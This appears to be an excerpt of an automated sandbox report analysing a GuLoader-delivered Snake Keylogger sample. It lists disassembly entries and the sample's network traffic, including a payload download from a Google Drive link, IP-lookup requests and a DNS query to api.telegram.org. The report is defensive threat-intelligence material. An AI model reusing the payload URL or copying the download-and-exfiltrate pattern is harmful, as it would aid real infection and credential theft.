Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CC25Eh	7_2_3A6CBF90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C6F3Eh	7_2_3A6C6C70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then mov esp, ebp	7_2_3A6C1C48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then mov esp, ebp	7_2_3A6C1C58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C8EF6h	7_2_3A6C8C28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CC6EEh	7_2_3A6CC420
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C2ACEh	7_2_3A6C2800
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CEEF8h	7_2_3A6CEC00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CAEE6h	7_2_3A6CAC18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CDBD8h	7_2_3A6CD8E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CF3C0h	7_2_3A6CF0C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CB378h	7_2_3A6CB0A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C9386h	7_2_3A6C90B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C4F4Eh	7_2_3A6C4C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C2F5Eh	7_2_3A6C2C90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C9816h	7_2_3A6C9548
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C33EEh	7_2_3A6C3120
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C73CEh	7_2_3A6C7100
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C53DEh	7_2_3A6C5110
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C9CA6h	7_2_3A6C99D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CE0A0h	7_2_3A6CDDA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C586Eh	7_2_3A6C55A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C387Eh	7_2_3A6C35B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6C785Eh	7_2_3A6C7590
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6CF888h	7_2_3A6CF590
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DE4F1h	7_2_3A6DE248
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6D2561h	7_2_3A6D22B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6D2B28h	7_2_3A6D2710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DF08Dh	7_2_3A6DED50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6D2B28h	7_2_3A6D2A56
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6D0D0Dh	7_2_3A6D0B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6D1697h	7_2_3A6D0B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DCE71h	7_2_3A6DCBC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_3A6D0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_3A6D0853
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DD369h	7_2_3A6DD0C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DDC19h	7_2_3A6DD970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_3A6D0673
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DC8B1h	7_2_3A6DC608
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DE949h	7_2_3A6DE6A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DD7C1h	7_2_3A6DD518
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3A6DE099h	7_2_3A6DDDF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B038918h	7_2_3B038620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B0375F8h	7_2_3B037300
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B030800h	7_2_3B030508
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B035E10h	7_2_3B035B18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B034628h	7_2_3B034330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B032E40h	7_2_3B032B48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B038450h	7_2_3B038158
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B031658h	7_2_3B031360
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B036C68h	7_2_3B036970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B035480h	7_2_3B035188
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B033C98h	7_2_3B0339A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B0324B0h	7_2_3B0321B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B037AC0h	7_2_3B0377C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B030CC8h	7_2_3B0309D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B0362D8h	7_2_3B035FE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B034AF0h	7_2_3B0347F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B033308h	7_2_3B033010
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B031B20h	7_2_3B031828
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B037131h	7_2_3B036E38
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B030338h	7_2_3B030040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B035948h	7_2_3B035650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B034160h	7_2_3B033E68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B032978h	7_2_3B032680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B037F88h	7_2_3B037C90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B031190h	7_2_3B030E98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B0367A0h	7_2_3B0364A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B034FB8h	7_2_3B034CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B0337D0h	7_2_3B0334D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then jmp 3B031FE8h	7_2_3B031CF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_3B0B67D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_3B0B6778
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_3B0B67A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_3B0B67C8

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=15vbcfHhA3-NY0lHKD2HKKIGiP2ciaNOG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=15vbcfHhA3-NY0lHKD2HKKIGiP2ciaNOG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe